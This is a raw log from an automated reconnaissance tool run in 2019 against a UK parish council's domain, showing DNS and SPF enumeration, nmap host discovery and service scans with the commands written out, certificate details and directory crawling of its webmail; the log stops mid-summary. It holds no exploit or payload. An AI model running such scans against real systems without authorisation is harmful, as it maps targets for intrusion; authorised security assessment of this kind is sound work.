- IP: 104.47.20.36 (United States)
- HostName: mundesleypc-gov-uk02c.mail.protection.outlook.com Type: MX
- HostName: mail-cwlgbr010036.inbound.protection.outlook.com Type: PTR
- Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
- No zone transfer found on nameserver 217.160.82.244
- No zone transfer found on nameserver 217.160.81.244
- Checking SPF record...
- Checking SPF record...
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 207.46.100.0/24, but only the network IP
- New IP found: 207.46.100.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 207.46.163.0/24, but only the network IP
- New IP found: 207.46.163.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 65.55.169.0/24, but only the network IP
- New IP found: 65.55.169.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 157.56.110.0/23, but only the network IP
- New IP found: 157.56.110.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 157.55.234.0/24, but only the network IP
- New IP found: 157.55.234.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 213.199.154.0/24, but only the network IP
- New IP found: 213.199.154.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 213.199.180.128/26, but only the network IP
- New IP found: 213.199.180.128
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 52.100.0.0/14, but only the network IP
- New IP found: 52.100.0.0
- Checking SPF record...
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 157.56.112.0/24, but only the network IP
- New IP found: 157.56.112.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 207.46.51.64/26, but only the network IP
- New IP found: 207.46.51.64
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 64.4.22.64/26, but only the network IP
- New IP found: 64.4.22.64
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 40.92.0.0/15, but only the network IP
- New IP found: 40.92.0.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 40.107.0.0/16, but only the network IP
- New IP found: 40.107.0.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 134.170.140.0/24, but only the network IP
- New IP found: 134.170.140.0
- Checking SPF record...
- There are no IPv4 addresses in the SPF. Maybe IPv6.
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 23.103.128.0/19, but only the network IP
- New IP found: 23.103.128.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 23.103.198.0/23, but only the network IP
- New IP found: 23.103.198.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 65.55.88.0/24, but only the network IP
- New IP found: 65.55.88.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 104.47.0.0/17, but only the network IP
- New IP found: 104.47.0.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 23.103.200.0/21, but only the network IP
- New IP found: 23.103.200.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 23.103.208.0/21, but only the network IP
- New IP found: 23.103.208.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 23.103.191.0/24, but only the network IP
- New IP found: 23.103.191.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 216.32.180.0/23, but only the network IP
- New IP found: 216.32.180.0
- WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 94.245.120.64/26, but only the network IP
- New IP found: 94.245.120.64
- New hostname found: 2202::/48
- There are no IPv4 addresses in the SPF. Maybe IPv6.
- Checking 193 most common hostnames using system default resolver...
- IP: 89.145.78.0 (United Kingdom)
- HostName: www.mundesley-pc.gov.uk. Type: A
- IP: 213.171.216.40 (United Kingdom)
- HostName: mail.mundesley-pc.gov.uk. Type: A
- IP: 213.171.216.231 (United Kingdom)
- HostName: webmail.mundesley-pc.gov.uk. Type: A
- IP: 213.171.216.50 (United Kingdom)
- HostName: smtp.mundesley-pc.gov.uk. Type: A
- Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
- Checking netblock 65.55.169.0
- Checking netblock 52.100.0.0
- Checking netblock 89.145.78.0
- Checking netblock 65.55.88.0
- Checking netblock 207.46.100.0
- Checking netblock 157.55.234.0
- Checking netblock 94.245.120.0
- Checking netblock 216.32.180.0
- Checking netblock 213.171.216.0
- Checking netblock 217.160.81.0
- Checking netblock 23.103.128.0
- Checking netblock 64.4.22.0
- Checking netblock 157.56.110.0
- Checking netblock 23.103.208.0
- Checking netblock 23.103.198.0
- Checking netblock 207.46.163.0
- Checking netblock 104.47.21.0
- Checking netblock 134.170.140.0
- Checking netblock 213.199.154.0
- Checking netblock 23.103.191.0
- Checking netblock 40.107.0.0
- Checking netblock 40.92.0.0
- Checking netblock 157.56.112.0
- Checking netblock 207.46.51.0
- Checking netblock 104.47.0.0
- Checking netblock 213.199.180.0
- Checking netblock 217.160.82.0
- Checking netblock 23.103.200.0
- Checking netblock 104.47.20.0
- Searching for mundesley-pc.gov.uk. emails in Google
- Checking 31 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
- Host 65.55.169.0 is up (reset ttl 64)
- Host 52.100.0.0 is up (reset ttl 64)
- Host 89.145.78.0 is up (reset ttl 64)
- Host 65.55.88.0 is up (reset ttl 64)
- Host 207.46.100.0 is up (reset ttl 64)
- Host 157.55.234.0 is up (reset ttl 64)
- Host 94.245.120.64 is up (reset ttl 64)
- Host 216.32.180.0 is up (reset ttl 64)
- Host 213.171.216.231 is up (echo-reply ttl 246)
- Host 217.160.81.244 is up (reset ttl 64)
- Host 23.103.128.0 is up (reset ttl 64)
- Host 213.171.216.50 is up (reset ttl 64)
- Host 64.4.22.64 is up (reset ttl 64)
- Host 157.56.110.0 is up (reset ttl 64)
- Host 23.103.208.0 is up (reset ttl 64)
- Host 23.103.198.0 is up (reset ttl 64)
- Host 207.46.163.0 is up (reset ttl 64)
- Host 213.171.216.40 is up (echo-reply ttl 246)
- Host 104.47.21.36 is up (reset ttl 64)
- Host 134.170.140.0 is up (reset ttl 64)
- Host 213.199.154.0 is up (reset ttl 64)
- Host 23.103.191.0 is up (reset ttl 64)
- Host 40.107.0.0 is up (reset ttl 64)
- Host 40.92.0.0 is up (reset ttl 64)
- Host 157.56.112.0 is up (reset ttl 64)
- Host 207.46.51.64 is up (reset ttl 64)
- Host 104.47.0.0 is up (reset ttl 64)
- Host 213.199.180.128 is up (reset ttl 64)
- Host 217.160.82.244 is up (echo-reply ttl 59)
- Host 23.103.200.0 is up (reset ttl 64)
- Host 104.47.20.36 is up (reset ttl 64)
- Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
- Scanning ip 65.55.169.0 ():
- Scanning ip 52.100.0.0 ():
- Scanning ip 89.145.78.0 (www.mundesley-pc.gov.uk.):
- 53/tcp open domain syn-ack ttl 50 ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
- | dns-nsid:
- |_ bind.version: 9.11.4-P2-RedHat-9.11.4-9.P2.el7
- Running (JUST GUESSING): Linux 2.6.X|4.X|3.X (91%)
- OS Info: Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- Scanning ip 65.55.88.0 ():
- Scanning ip 207.46.100.0 ():
- Scanning ip 157.55.234.0 ():
- Scanning ip 94.245.120.64 ():
- Scanning ip 216.32.180.0 ():
- Scanning ip 213.171.216.231 (webmail.mundesley-pc.gov.uk.):
- 80/tcp open http syn-ack ttl 55 nginx
- |_http-favicon: Unknown favicon MD5: C158FFDB11844ECC3EE02B86AA8E1A0B
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-title: Webmail :: Welcome to Webmail
- 443/tcp open ssl/http syn-ack ttl 55 nginx
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-title: Webmail :: Welcome to Webmail
- | ssl-cert: Subject: commonName=webmail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- | Subject Alternative Name: DNS:webmail.livemail.co.uk
- | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-12-10T00:00:00
- | Not valid after: 2020-12-09T12:00:00
- | MD5: e6ce 8502 b7b4 cf72 ac63 d3ab 19d7 acad
- |_SHA-1: cd2f e5b3 1740 fd64 335d 9b7f 9861 6b65 4a8c 5709
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- |_ http/1.1
- | tls-nextprotoneg:
- |_ http/1.1
- Device type: general purpose|storage-misc|media device|WAP
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (87%), HP embedded (85%), Infomir embedded (85%), Ubiquiti embedded (85%), Ubiquiti AirOS 5.X (85%)
- Scanning ip 217.160.81.244 (ns1.livedns.co.uk (PTR)):
- 53/tcp open domain syn-ack ttl 59 PowerDNS 3.3 or later
- | dns-nsid:
- | NSID: dns-pub-nl-ams-nkf04.server.lan (646e732d7075622d6e6c2d616d732d6e6b6630342e7365727665722e6c616e)
- | id.server: dns-pub-nl-ams-nkf04.server.lan
- |_ bind.version: Served by PowerDNS - https://www.powerdns.com/
- Scanning ip 23.103.128.0 ():
- Scanning ip 213.171.216.50 (smtp.mundesley-pc.gov.uk.):
- 465/tcp open ssl/smtps? syn-ack ttl 55
- |_smtp-commands: Couldn't establish connection on port 465
- 587/tcp open smtp syn-ack ttl 57 Postfix smtpd
- |_smtp-commands: smtp.livemail.co.uk, PIPELINING, SIZE 153600000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
- |_ssl-date: TLS randomness does not represent time
- Device type: storage-misc|general purpose
- Running (JUST GUESSING): HP embedded (85%), Linux 3.X|4.X (85%)
- OS Info: Service Info: Host: smtp.livemail.co.uk
- Scanning ip 64.4.22.64 ():
- Scanning ip 157.56.110.0 ():
- Scanning ip 23.103.208.0 ():
- Scanning ip 23.103.198.0 ():
- Scanning ip 207.46.163.0 ():
- Scanning ip 213.171.216.40 (mail.mundesley-pc.gov.uk.):
- 110/tcp open pop3 syn-ack ttl 55 Dovecot pop3d
- |_pop3-capabilities: STLS RESP-CODES AUTH-RESP-CODE UIDL PIPELINING USER SASL(PLAIN) TOP CAPA
- | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- | Subject Alternative Name: DNS:mail.livemail.co.uk
- | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-12-06T00:00:00
- | Not valid after: 2020-12-06T12:00:00
- | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- 143/tcp open imap syn-ack ttl 55 Dovecot imapd
- |_imap-capabilities: more STARTTLS LOGIN-REFERRALS have SASL-IR listed IDLE LITERAL+ OK post-login capabilities ID ENABLE IMAP4rev1 AUTH=PLAINA0001 Pre-login
- | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- | Subject Alternative Name: DNS:mail.livemail.co.uk
- | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-12-06T00:00:00
- | Not valid after: 2020-12-06T12:00:00
- | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- 993/tcp open ssl/imap syn-ack ttl 55 Dovecot imapd
- |_imap-capabilities: have LOGIN-REFERRALS more SASL-IR listed IDLE LITERAL+ OK post-login capabilities ID ENABLE IMAP4rev1 AUTH=PLAINA0001 Pre-login
- | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- | Subject Alternative Name: DNS:mail.livemail.co.uk
- | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-12-06T00:00:00
- | Not valid after: 2020-12-06T12:00:00
- | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- 995/tcp open ssl/pop3 syn-ack ttl 57 Dovecot pop3d
- |_pop3-capabilities: UIDL RESP-CODES PIPELINING USER AUTH-RESP-CODE SASL(PLAIN) TOP CAPA
- | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- | Subject Alternative Name: DNS:mail.livemail.co.uk
- | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-12-06T00:00:00
- | Not valid after: 2020-12-06T12:00:00
- | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- Device type: general purpose|storage-misc
- Scanning ip 104.47.21.36 (mail-lo2gbr010036.inbound.protection.outlook.com (PTR)):
- Scanning ip 134.170.140.0 ():
- Scanning ip 213.199.154.0 ():
- Scanning ip 23.103.191.0 ():
- Scanning ip 40.107.0.0 ():
- Scanning ip 40.92.0.0 ():
- Scanning ip 157.56.112.0 ():
- Scanning ip 207.46.51.64 ():
- Scanning ip 104.47.0.0 ():
- Scanning ip 213.199.180.128 ():
- Scanning ip 217.160.82.244 (ns2.livedns.co.uk (PTR)):
- 53/tcp open domain syn-ack ttl 59 PowerDNS 3.3 or later
- | dns-nsid:
- | NSID: dns-pub-nl-ams-nkf03.server.lan (646e732d7075622d6e6c2d616d732d6e6b6630332e7365727665722e6c616e)
- | id.server: dns-pub-nl-ams-nkf03.server.lan
- |_ bind.version: Served by PowerDNS - https://www.powerdns.com/
- Scanning ip 23.103.200.0 ():
- Scanning ip 104.47.20.36 (mail-cwlgbr010036.inbound.protection.outlook.com (PTR)):
- WebCrawling domain's web servers... up to 50 max links.
- + URL to crawl: http://webmail.mundesley-pc.gov.uk.
- + Date: 2019-09-05
- + Crawling URL: http://webmail.mundesley-pc.gov.uk.:
- + Links:
- + Crawling http://webmail.mundesley-pc.gov.uk.
- + Crawling http://webmail.mundesley-pc.gov.uk./skins/googie_larry/styles.css?s=1426489652 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./skins/googie_larry/svggradients.css?s=1401897190 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./skins/googie_larry/iehacks.css?s=1401897190 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./skins/googie_larry/ie7hacks.css?s=1401897190 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/larry/jquery-ui.css?s=1566991207 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./skins/googie_larry/ui.js?s=1401897190 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,800,700,600,300 (404 Not Found)
- + Crawling http://webmail.mundesley-pc.gov.uk./program/js/jquery.min.js?s=1566991445 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./program/js/common.min.js?s=1566991207 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./program/js/app.min.js?s=1566991207 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./program/js/jstz.min.js?s=1566991446 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/jquery-ui.min.js?s=1566991207 (File! Not crawling it.)
- + Crawling http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/i18n/jquery.ui.datepicker-en-GB.js?s=1566991207 (File! Not crawling it.)
- + Searching for directories...
- - Found: http://webmail.mundesley-pc.gov.uk./fonts.googleapis.com/
- - Found: http://webmail.mundesley-pc.gov.uk./skins/
- - Found: http://webmail.mundesley-pc.gov.uk./skins/googie_larry/
- - Found: http://webmail.mundesley-pc.gov.uk./skins/googie_larry/images/
- - Found: http://webmail.mundesley-pc.gov.uk./branding/
- - Found: http://webmail.mundesley-pc.gov.uk./branding/fasthosts/
- - Found: http://webmail.mundesley-pc.gov.uk./plugins/
- - Found: http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/
- - Found: http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/
- - Found: http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/larry/
- - Found: http://webmail.mundesley-pc.gov.uk./program/
- - Found: http://webmail.mundesley-pc.gov.uk./program/js/
- - Found: http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/
- - Found: http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/i18n/
- + Searching open folders...
- - http://webmail.mundesley-pc.gov.uk./fonts.googleapis.com/ (404 Not Found)
- - http://webmail.mundesley-pc.gov.uk./skins/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/images/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./branding/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./branding/fasthosts/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/larry/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./program/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./program/js/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/i18n/ (403 Forbidden)
- + Crawl finished successfully.
- ----------------------------------------------------------------------
- Summary of http://http://webmail.mundesley-pc.gov.uk.
- ----------------------------------------------------------------------
- + Links crawled:
- - http://webmail.mundesley-pc.gov.uk.
- - http://webmail.mundesley-pc.gov.uk./fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,800,700,600,300 (404 Not Found)
- Total links crawled: 2
- + Links to files found:
- - http://webmail.mundesley-pc.gov.uk./branding/fasthosts/whitelabel.jpg
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/i18n/jquery.ui.datepicker-en-GB.js?s=1566991207
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/jquery-ui.min.js?s=1566991207
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/larry/jquery-ui.css?s=1566991207
- - http://webmail.mundesley-pc.gov.uk./program/js/app.min.js?s=1566991207
- - http://webmail.mundesley-pc.gov.uk./program/js/common.min.js?s=1566991207
- - http://webmail.mundesley-pc.gov.uk./program/js/jquery.min.js?s=1566991445
- - http://webmail.mundesley-pc.gov.uk./program/js/jstz.min.js?s=1566991446
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/ie7hacks.css?s=1401897190
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/iehacks.css?s=1401897190
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/images/favicon.ico
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/styles.css?s=1426489652
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/svggradients.css?s=1401897190
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/ui.js?s=1401897190
- Total links to files: 14
- + Externals links found:
- Total external links: 0
- + Email addresses found:
- Total email address found: 0
- + Directories found:
- - http://webmail.mundesley-pc.gov.uk./branding/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./branding/fasthosts/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./fonts.googleapis.com/ (404 Not Found)
- - http://webmail.mundesley-pc.gov.uk./plugins/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/js/i18n/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./plugins/jqueryui/themes/larry/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./program/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./program/js/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./skins/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/ (403 Forbidden)
- - http://webmail.mundesley-pc.gov.uk./skins/googie_larry/images/ (403 Forbidden)
- Total directories: 14
- + Directory indexing found:
- Total directories with indexing: 0
- ----------------------------------------------------------------------
- + URL to crawl: https://webmail.mundesley-pc.gov.uk.
- + Date: 2019-09-05
- + Crawling URL: https://webmail.mundesley-pc.gov.uk.:
- + Links:
- + Crawling https://webmail.mundesley-pc.gov.uk.
- + Searching for directories...
- + Searching open folders...
- --Finished--
- Summary information for domain mundesley-pc.gov.uk.
- -----------------------------------------
- Domain Ips Information:
- IP: 65.55.169.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 52.100.0.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 89.145.78.0
- HostName: www.mundesley-pc.gov.uk. Type: A
- Country: United Kingdom
- Is Active: True (reset ttl 64)
- Port: 53/tcp open domain syn-ack ttl 50 ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
- Script Info: | dns-nsid:
- Script Info: |_ bind.version: 9.11.4-P2-RedHat-9.11.4-9.P2.el7
- Script Info: Running (JUST GUESSING): Linux 2.6.X|4.X|3.X (91%)
- Os Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- IP: 65.55.88.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 207.46.100.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 157.55.234.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 94.245.120.64
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 216.32.180.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 213.171.216.231
- HostName: webmail.mundesley-pc.gov.uk. Type: A
- Country: United Kingdom
- Is Active: True (echo-reply ttl 246)
- Port: 80/tcp open http syn-ack ttl 55 nginx
- Script Info: |_http-favicon: Unknown favicon MD5: C158FFDB11844ECC3EE02B86AA8E1A0B
- Script Info: | http-methods:
- Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
- Script Info: |_http-title: Webmail :: Welcome to Webmail
- Port: 443/tcp open ssl/http syn-ack ttl 55 nginx
- Script Info: | http-methods:
- Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
- Script Info: |_http-title: Webmail :: Welcome to Webmail
- Script Info: | ssl-cert: Subject: commonName=webmail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- Script Info: | Subject Alternative Name: DNS:webmail.livemail.co.uk
- Script Info: | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- Script Info: | Public Key type: rsa
- Script Info: | Public Key bits: 2048
- Script Info: | Signature Algorithm: sha256WithRSAEncryption
- Script Info: | Not valid before: 2018-12-10T00:00:00
- Script Info: | Not valid after: 2020-12-09T12:00:00
- Script Info: | MD5: e6ce 8502 b7b4 cf72 ac63 d3ab 19d7 acad
- Script Info: |_SHA-1: cd2f e5b3 1740 fd64 335d 9b7f 9861 6b65 4a8c 5709
- Script Info: |_ssl-date: TLS randomness does not represent time
- Script Info: | tls-alpn:
- Script Info: |_ http/1.1
- Script Info: | tls-nextprotoneg:
- Script Info: |_ http/1.1
- Script Info: Device type: general purpose|storage-misc|media device|WAP
- Script Info: Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (87%), HP embedded (85%), Infomir embedded (85%), Ubiquiti embedded (85%), Ubiquiti AirOS 5.X (85%)
- IP: 217.160.81.244
- HostName: ns1.livedns.co.uk Type: NS
- HostName: ns1.livedns.co.uk Type: PTR
- Country: Germany
- Is Active: True (reset ttl 64)
- Port: 53/tcp open domain syn-ack ttl 59 PowerDNS 3.3 or later
- Script Info: | dns-nsid:
- Script Info: | NSID: dns-pub-nl-ams-nkf04.server.lan (646e732d7075622d6e6c2d616d732d6e6b6630342e7365727665722e6c616e)
- Script Info: | id.server: dns-pub-nl-ams-nkf04.server.lan
- Script Info: |_ bind.version: Served by PowerDNS - https://www.powerdns.com/
- IP: 23.103.128.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 213.171.216.50
- HostName: smtp.mundesley-pc.gov.uk. Type: A
- Country: United Kingdom
- Is Active: True (reset ttl 64)
- Port: 465/tcp open ssl/smtps? syn-ack ttl 55
- Script Info: |_smtp-commands: Couldn't establish connection on port 465
- Port: 587/tcp open smtp syn-ack ttl 57 Postfix smtpd
- Script Info: |_smtp-commands: smtp.livemail.co.uk, PIPELINING, SIZE 153600000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
- Script Info: |_ssl-date: TLS randomness does not represent time
- Script Info: Device type: storage-misc|general purpose
- Script Info: Running (JUST GUESSING): HP embedded (85%), Linux 3.X|4.X (85%)
- Os Info: Host: smtp.livemail.co.uk
- IP: 64.4.22.64
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 157.56.110.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 23.103.208.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 23.103.198.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 207.46.163.0
- Type: SPF
- Is Active: True (reset ttl 64)
- IP: 213.171.216.40
- HostName: mail.mundesley-pc.gov.uk. Type: A
- Country: United Kingdom
- Is Active: True (echo-reply ttl 246)
- Port: 110/tcp open pop3 syn-ack ttl 55 Dovecot pop3d
- Script Info: |_pop3-capabilities: STLS RESP-CODES AUTH-RESP-CODE UIDL PIPELINING USER SASL(PLAIN) TOP CAPA
- Script Info: | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- Script Info: | Subject Alternative Name: DNS:mail.livemail.co.uk
- Script Info: | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- Script Info: | Public Key type: rsa
- Script Info: | Public Key bits: 2048
- Script Info: | Signature Algorithm: sha256WithRSAEncryption
- Script Info: | Not valid before: 2018-12-06T00:00:00
- Script Info: | Not valid after: 2020-12-06T12:00:00
- Script Info: | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- Script Info: |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- Port: 143/tcp open imap syn-ack ttl 55 Dovecot imapd
- Script Info: |_imap-capabilities: more STARTTLS LOGIN-REFERRALS have SASL-IR listed IDLE LITERAL+ OK post-login capabilities ID ENABLE IMAP4rev1 AUTH=PLAINA0001 Pre-login
- Script Info: | ssl-cert: Subject: commonName=mail.livemail.co.uk/organizationName=Fasthosts Internet Limited/stateOrProvinceName=Gloucestershire/countryName=GB
- Script Info: | Subject Alternative Name: DNS:mail.livemail.co.uk
- Script Info: | Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
- Script Info: | Public Key type: rsa
- Script Info: | Public Key bits: 2048
- Script Info: | Signature Algorithm: sha256WithRSAEncryption
- Script Info: | Not valid before: 2018-12-06T00:00:00
- Script Info: | Not valid after: 2020-12-06T12:00:00
- Script Info: | MD5: fa44 ec75 70eb 9d71 2787 1022 09c3 d5f8
- Script Info: |_SHA-1: 869e a9ca a4f4 f83e 1b80 9056 13db 9adc 15de c62d
- Port: 993/tcp open ssl/imap syn-ack ttl 55 Dovecot imapd
